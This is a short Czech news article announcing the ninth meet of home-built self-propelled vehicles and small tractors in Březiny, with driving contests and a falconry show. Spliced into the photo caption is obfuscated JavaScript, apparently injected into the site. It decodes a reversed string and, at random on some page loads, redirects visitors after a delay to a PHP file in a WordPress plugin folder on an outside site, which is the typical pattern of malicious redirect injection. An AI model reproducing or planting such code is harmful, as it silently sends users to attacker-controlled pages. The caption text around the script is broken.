Rainbow page separator

V Březinách předvedou majitelé kvality svých samohybů

Středa, 11. května 2022

Březiny / V pořadí už devátý ročník srazu samohybů, traktůrků a dalších různých originálních vehiklů nejenom domácí výroby chystají na sobotu 14. května pořadatelé ze spolku RKV v Březinách nedaleko Sněžného. Akce se v malé vesničce ve Žďárských vrších ležící na rozhraní žďárského a svitavského okresu uskuteční od 14 hodin na hřišti u tamního rybníka. Prezence vozidel, s kterými se jejich majitelé na sraz dostaví, začne o hodinu dříve.
Součástí akce se stane předvedení jednotlivých strojů a rovněž prověření jejich kvalit v několika soutěžních kategoriích, jako je jízda zručnosti, jízda do vrchu nebo překonání brodu. V rámci doprovodného programu se mohou diváci těšit na ukázku výcviku dravců, případně burzu.

ilustrační fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to